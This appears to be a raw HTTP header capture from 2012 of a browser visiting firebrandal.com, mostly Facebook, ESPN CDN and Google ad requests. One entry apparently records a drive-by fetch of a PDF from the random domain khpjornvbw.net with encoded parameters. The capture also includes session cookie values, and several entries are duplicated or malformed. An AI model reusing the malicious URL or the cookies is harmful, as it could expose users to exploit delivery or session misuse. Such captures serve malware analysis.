Accept-Ranges: bytes
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=1117473
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /prod/assets/bullet_gray.gif HTTP/1.1

Host: a1.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a.espncdn.com/combiner/c?v=201003241632&amp;css=base.201003241632.css,modules.201005171156.css
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 72
Last-Modified: Tue, 30 Dec 2008 16:01:29 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
From: EGW06
Cache-Expires: Sat, 04 Jun 2011 16:29:15 GMT
Cache-Control: max-age=1118142
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /rsrc.php/v2/yI/x/1dQf_ATK831.png HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df1ee025f864e51a%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F02%2Fpoll-biggest-offseason-priority%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Last-Modified: Fri, 29 Jun 2012 21:48:06 GMT
X-Content-Type-Options: nosniff
X-FB-Debug: DROeMGRPcdwLS4zkFLAnDVu5opvpxfNclOg2Khukp6I=
Content-Length: 567
Cache-Control: public, max-age=25563402
Expires: Wed, 28 Aug 2013 13:57:24 GMT
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /rsrc.php/v2/yf/r/ermz5xIRKqj.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df51f71b09b96fe%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F2012%2F11%2F02%2F21012%2F&amp;node_type=link&amp;width=90&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=false&amp;extended_social_context=false
Origin: http://www.facebook.com
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 26 Oct 2012 01:14:26 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: N+I8JRuT6Vc1XTfCzT6+2ZeZAilFlXFQGUdFwvperAo=
Content-Length: 37956
Vary: Accept-Encoding
Cache-Control: public, max-age=31003551
Expires: Wed, 30 Oct 2013 13:06:33 GMT
Date: Mon, 05 Nov 2012 17:00:42 GMT
Connection: keep-alive
GET /pagead/drt/ui HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: https://googleads.g.doubleclick.net/pagead/drt/si?p=CAA&amp;ut=AFAKxlQAAAAAUJf0PvlpxKVvj3QvKDrxSSQe4Q3SDUej
Cache-Control: private
X-Frame-Options: ALLOWALL
X-Content-Type-Options: nosniff
Date: Mon, 05 Nov 2012 17:00:42 GMT
Server: safe
Content-Length: 304
X-XSS-Protection: 1; mode=block
GET /plugins/like.php?api_key=233237476726965&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df105f2da49182c2%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&href=http%3A%2F%2Ffirebrandal.com%2F&node_type=link&width=285&font=false&layout=standard&colorscheme=light&show_faces=true&send=true&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df105f2da49182c2%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F&amp;node_type=link&amp;width=285&amp;font=false&amp;layout=standard&amp;colorscheme=light&amp;show_faces=true&amp;send=true&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: umZufQav3dzeqriNVUIxe04vQITfzhbbjUoF4LcVEqI=
Date: Mon, 05 Nov 2012 17:00:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /bg/4G9Wrs00U1VDR2n554I3ZaqsEb6eVQHiyr-SwTUWeeM.js HTTP/1.1

Host: www.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3256725667777155&amp;output=html&amp;h=90&amp;slotname=0998046247&amp;w=728&amp;lmt=1352134830&amp;flash=10.0.45&amp;url=http%3A%2F%2Ffirebrandal.com%2F&amp;dt=1352134836387&amp;bpp=7&amp;shv=r20121023&amp;jsv=r20110914&amp;correlator=1352134836584&amp;frm=20&amp;adk=353781055&amp;ga_vid=699239837.1352134837&amp;ga_sid=1352134837&amp;ga_hid=1329589676&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=tahoma&amp;dfs=12&amp;adx=216&amp;ady=264&amp;biw=1159&amp;bih=778&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=945&amp;xpc=qkZdIfVrBI&amp;p=http%3A//firebrandal.com
HTTP/1.1 200 OK

Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Wed, 17 Oct 2012 01:18:42 GMT
Date: Thu, 01 Nov 2012 01:09:30 GMT
Expires: Fri, 09 Nov 2012 01:09:30 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 3267
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=691200
Age: 402673
GET /links/majority_last_submitting.php?lwx=3436380b03&jyonhcf=4a&ihy=0a340b37043808020237&yfjj=0a0002000200060708 HTTP/1.1

Host: khpjornvbw.net
GET /links/majority_last_submitting.php?lwx=3436380b03&amp;jyonhcf=4a&amp;ihy=0a340b37043808020237&amp;yfjj=0a0002000200060708 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://khpjornvbw.net/links/majority_last_submitting.php
HTTP/1.1 200 OK

Content-Type: application/pdf
Server: nginx/1.2.4
Date: Mon, 05 Nov 2012 16:59:57 GMT
Content-Length: 13486
Connection: keep-alive
Accept-Ranges: bytes
Content-Disposition: inline; filename=63903.pdf
GET /dialog/oauth?client_id=233237476726965&response_type=token%2Csigned_request%2Ccode&display=none&domain=firebrandal.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df137e54e5fd8e48%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent&sdk=joey HTTP/1.1

Host: www.facebook.com
GET /dialog/oauth?client_id=233237476726965&amp;response_type=token%2Csigned_request%2Ccode&amp;display=none&amp;domain=firebrandal.com&amp;origin=1&amp;redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df137e54e5fd8e48%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent&amp;sdk=joey HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/


GET /south_africa/jquery.scrollTo.php HTTP/1.1

Host: template

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/


GET /themes/supersleight.php HTTP/1.1

Host: wp-content

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/


GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK


GET /pagead/drt/si?p=CAA&ut=AFAKxlQAAAAAUJf0PvlpxKVvj3QvKDrxSSQe4Q3SDUej HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/drt/si?p=CAA&amp;ut=AFAKxlQAAAAAUJf0PvlpxKVvj3QvKDrxSSQe4Q3SDUej HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42


GET /rsrc.php/v2/yF/r/biEomB0hUUB.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=233237476726965&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D12%23cb%3Df180827f0492dbc%26origin%3Dhttp%253A%252F%252Ffirebrandal.com%252Ffc49925b02da48%26domain%3Dfirebrandal.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Ffirebrandal.com%2F&amp;node_type=link&amp;width=285&amp;font=false&amp;layout=standard&amp;colorscheme=light&amp;show_faces=true&amp;send=true&amp;extended_social_context=false